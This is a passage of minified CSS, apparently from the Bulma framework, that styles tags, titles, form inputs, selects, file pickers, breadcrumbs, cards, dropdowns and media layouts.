center}.tag:not(body).is-delete:before{height:1px;width:50%}.tag:not(body).is-delete:after{height:50%;width:1px}.tag:not(body).is-delete:hover,.tag:not(body).is-delete:focus{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:9999px}a.tag:hover{text-decoration:underline}.title,.subtitle{word-break:break-word}.title em,.title span,.subtitle em,.subtitle span{font-weight:inherit}.title sub,.subtitle sub,.title sup,.subtitle sup{font-size:.75em}.title .tag,.subtitle .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.number{align-items:center;background-color:#f5f5f5;border-radius:9999px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.textarea,.select select{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.textarea::-moz-placeholder,.select select::-moz-placeholder{color:#3636364d}.input::-webkit-input-placeholder,.textarea::-webkit-input-placeholder,.select select::-webkit-input-placeholder{color:#3636364d}.input:-moz-placeholder,.textarea:-moz-placeholder,.select select:-moz-placeholder{color:#3636364d}.input:-ms-input-placeholder,.textarea:-ms-input-placeholder,.select select:-ms-input-placeholder{color:#3636364d}.input:hover,.textarea:hover,.select select:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered{border-color:#b5b5b5}.input:focus,.textarea:focus,.select select:focus,.is-focused.input,.is-focused.textarea,.select select.is-focused,.input:active,.textarea:active,.select select:active,.is-active.input,.is-active.textarea,.select select.is-active{border-color:#485fc7;box-shadow:0 0 0 .125em #485fc740}.input[disabled],.textarea[disabled],.select select[disabled],fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,.select select[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder{color:#7a7a7a4d}.input[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder{color:#7a7a7a4d}.input[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,.select select[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder{color:#7a7a7a4d}.input[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder{color:#7a7a7a4d}.input,.textarea{box-shadow:inset 0 .0625em .125em #0a0a0a0d;max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:focus,.is-white.textarea:focus,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.input:active,.is-white.textarea:active,.is-white.is-active.input,.is-white.is-active.textarea{box-shadow:0 0 0 .125em #ffffff40}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:focus,.is-black.textarea:focus,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.input:active,.is-black.textarea:active,.is-black.is-active.input,.is-black.is-active.textarea{box-shadow:0 0 0 .125em #0a0a0a40}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:focus,.is-light.textarea:focus,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.input:active,.is-light.textarea:active,.is-light.is-active.input,.is-light.is-active.textarea{box-shadow:0 0 0 .125em #f5f5f540}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:focus,.is-dark.textarea:focus,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.input:active,.is-dark.textarea:active,.is-dark.is-active.input,.is-dark.is-active.textarea{box-shadow:0 0 0 .125em #36363640}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:focus,.is-primary.textarea:focus,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.input:active,.is-primary.textarea:active,.is-primary.is-active.input,.is-primary.is-active.textarea{box-shadow:0 0 0 .125em #00d1b240}.is-link.input,.is-link.textarea{border-color:#485fc7}.is-link.input:focus,.is-link.textarea:focus,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.input:active,.is-link.textarea:active,.is-link.is-active.input,.is-link.is-active.textarea{box-shadow:0 0 0 .125em #485fc740}.is-info.input,.is-info.textarea{border-color:#3e8ed0}.is-info.input:focus,.is-info.textarea:focus,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.input:active,.is-info.textarea:active,.is-info.is-active.input,.is-info.is-active.textarea{box-shadow:0 0 0 .125em #3e8ed040}.is-success.input,.is-success.textarea{border-color:#48c78e}.is-success.input:focus,.is-success.textarea:focus,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.input:active,.is-success.textarea:active,.is-success.is-active.input,.is-success.is-active.textarea{box-shadow:0 0 0 .125em #48c78e40}.is-warning.input,.is-warning.textarea{border-color:#ffe08a}.is-warning.input:focus,.is-warning.textarea:focus,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.input:active,.is-warning.textarea:active,.is-warning.is-active.input,.is-warning.is-active.textarea{box-shadow:0 0 0 .125em #ffe08a40}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:focus,.is-danger.textarea:focus,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.input:active,.is-danger.textarea:active,.is-danger.is-active.input,.is-danger.is-active.textarea{box-shadow:0 0 0 .125em #f1466840}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:9999px;padding-left:calc(1.125em - 1px);padding-right:calc(1.125em - 1px)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio,.checkbox input[disabled],.radio input[disabled]{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading):after{border-color:#485fc7;right:1.125em;z-index:4}.select.is-rounded select{border-radius:9999px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:none}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover:after{border-color:#363636}.select.is-white:not(:hover):after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select:hover,.select.is-white select.is-hovered{border-color:#f2f2f2}.select.is-white select:focus,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select.is-active{box-shadow:0 0 0 .125em #ffffff40}.select.is-black:not(:hover):after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select:hover,.select.is-black select.is-hovered{border-color:#000}.select.is-black select:focus,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select.is-active{box-shadow:0 0 0 .125em #0a0a0a40}.select.is-light:not(:hover):after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select:hover,.select.is-light select.is-hovered{border-color:#e8e8e8}.select.is-light select:focus,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select.is-active{box-shadow:0 0 0 .125em #f5f5f540}.select.is-dark:not(:hover):after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select:hover,.select.is-dark select.is-hovered{border-color:#292929}.select.is-dark select:focus,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select.is-active{box-shadow:0 0 0 .125em #36363640}.select.is-primary:not(:hover):after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select:hover,.select.is-primary select.is-hovered{border-color:#00b89c}.select.is-primary select:focus,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select.is-active{box-shadow:0 0 0 .125em #00d1b240}.select.is-link:not(:hover):after{border-color:#485fc7}.select.is-link select{border-color:#485fc7}.select.is-link select:hover,.select.is-link select.is-hovered{border-color:#3a51bb}.select.is-link select:focus,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select.is-active{box-shadow:0 0 0 .125em #485fc740}.select.is-info:not(:hover):after{border-color:#3e8ed0}.select.is-info select{border-color:#3e8ed0}.select.is-info select:hover,.select.is-info select.is-hovered{border-color:#3082c5}.select.is-info select:focus,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select.is-active{box-shadow:0 0 0 .125em #3e8ed040}.select.is-success:not(:hover):after{border-color:#48c78e}.select.is-success select{border-color:#48c78e}.select.is-success select:hover,.select.is-success select.is-hovered{border-color:#3abb81}.select.is-success select:focus,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select.is-active{box-shadow:0 0 0 .125em #48c78e40}.select.is-warning:not(:hover):after{border-color:#ffe08a}.select.is-warning select{border-color:#ffe08a}.select.is-warning select:hover,.select.is-warning select.is-hovered{border-color:#ffd970}.select.is-warning select:focus,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select.is-active{box-shadow:0 0 0 .125em #ffe08a40}.select.is-danger:not(:hover):after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select:hover,.select.is-danger select.is-hovered{border-color:#ef2e55}.select.is-danger select:focus,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select.is-active{box-shadow:0 0 0 .125em #f1466840}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled:after{border-color:#7a7a7a!important;opacity:.5}.select.is-fullwidth,.select.is-fullwidth select{width:100%}.select.is-loading:after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white:hover .file-cta,.file.is-white.is-hovered .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white:focus .file-cta,.file.is-white.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffffff40;color:#0a0a0a}.file.is-white:active .file-cta,.file.is-white.is-active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black:hover .file-cta,.file.is-black.is-hovered .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black:focus .file-cta,.file.is-black.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #0a0a0a40;color:#fff}.file.is-black:active .file-cta,.file.is-black.is-active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.file.is-light:hover .file-cta,.file.is-light.is-hovered .file-cta{background-color:#eee;border-color:transparent;color:#000000b3}.file.is-light:focus .file-cta,.file.is-light.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f5f5f540;color:#000000b3}.file.is-light:active .file-cta,.file.is-light.is-active .file-cta{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark:hover .file-cta,.file.is-dark.is-hovered .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark:focus .file-cta,.file.is-dark.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #36363640;color:#fff}.file.is-dark:active .file-cta,.file.is-dark.is-active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary:hover .file-cta,.file.is-primary.is-hovered .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary:focus .file-cta,.file.is-primary.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #00d1b240;color:#fff}.file.is-primary:active .file-cta,.file.is-primary.is-active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#485fc7;border-color:transparent;color:#fff}.file.is-link:hover .file-cta,.file.is-link.is-hovered .file-cta{background-color:#3e56c4;border-color:transparent;color:#fff}.file.is-link:focus .file-cta,.file.is-link.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #485fc740;color:#fff}.file.is-link:active .file-cta,.file.is-link.is-active .file-cta{background-color:#3a51bb;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3e8ed0;border-color:transparent;color:#fff}.file.is-info:hover .file-cta,.file.is-info.is-hovered .file-cta{background-color:#3488ce;border-color:transparent;color:#fff}.file.is-info:focus .file-cta,.file.is-info.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #3e8ed040;color:#fff}.file.is-info:active .file-cta,.file.is-info.is-active .file-cta{background-color:#3082c5;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c78e;border-color:transparent;color:#fff}.file.is-success:hover .file-cta,.file.is-success.is-hovered .file-cta{background-color:#3ec487;border-color:transparent;color:#fff}.file.is-success:focus .file-cta,.file.is-success.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #48c78e40;color:#fff}.file.is-success:active .file-cta,.file.is-success.is-active .file-cta{background-color:#3abb81;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffe08a;border-color:transparent;color:#000000b3}.file.is-warning:hover .file-cta,.file.is-warning.is-hovered .file-cta{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.file.is-warning:focus .file-cta,.file.is-warning.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffe08a40;color:#000000b3}.file.is-warning:active .file-cta,.file.is-warning.is-active .file-cta{background-color:#ffd970;border-color:transparent;color:#000000b3}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger:hover .file-cta,.file.is-danger.is-hovered .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger:focus .file-cta,.file.is-danger.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f1466840;color:#fff}.file.is-danger:active .file-cta,.file.is-danger.is-active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-normal{font-size:1rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:none;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:inherit;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon .fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#485fc7}.help.is-info{color:#3e8ed0}.help.is-success{color:#48c78e}.help.is-warning{color:#ffe08a}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered{z-index:2}.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]).is-active{z-index:3}.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width: 769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width: 768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width: 769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width: 769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:inherit}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading:after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#485fc7;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li:before{color:#b5b5b5;content:"/"}.breadcrumb ul,.breadcrumb ol{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li:before{content:"→"}.breadcrumb.has-bullet-separator li+li:before{content:"•"}.breadcrumb.has-dot-separator li+li:before{content:"·"}.breadcrumb.has-succeeds-separator li+li:before{content:"≻"}.card{background-color:#fff;border-radius:.25rem;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;max-width:100%;position:relative}.card-header:first-child,.card-content:first-child,.card-footer:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-header:last-child,.card-content:last-child,.card-footer:last-child{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em #0a0a0a1a;display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0;align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-image:first-child img{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-image:last-child img{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:inherit;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#485fc7;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile,.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width: 769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .title,.level-item .subtitle{margin-bottom:0}@media screen and (max-width: 768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width: 769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width: 768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width: 769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width: 769px),print{.level-right{display:flex}}.media{align-items:flex-start;display:flex;text-align:inherit}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid 